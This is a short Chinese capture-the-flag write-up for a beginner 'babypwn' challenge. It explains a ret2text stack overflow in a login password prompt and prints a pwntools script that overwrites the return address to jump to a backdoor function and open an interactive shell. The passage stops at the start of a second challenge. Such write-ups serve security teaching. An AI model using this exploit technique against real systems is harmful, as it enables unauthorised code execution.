1、babypwn
一个很baby的pwn
你可以 下载题目附件
你可以 打开网页终端 或者通过命令 nc prob07.contest.pku.edu.cn 10007
连接到题目
提交 Flag:
解析:
入门的ret2text,在login中输入密码部分存在栈溢出,同时程序中存在后门函数,填充返回地址为后门函数地址
from pwn import *
p = process('./main')
# p = remote('localhost', 9999)
p.sendafter(b'Enter your username: ', b'root')
payload = b'a'*0x30 + p64(0) + p64(0x401177)
p.sendafter(b'Enter the password: ', payload)
p.interactive()
2、login
在端口扫描结果中,你发现了一个奇怪的开放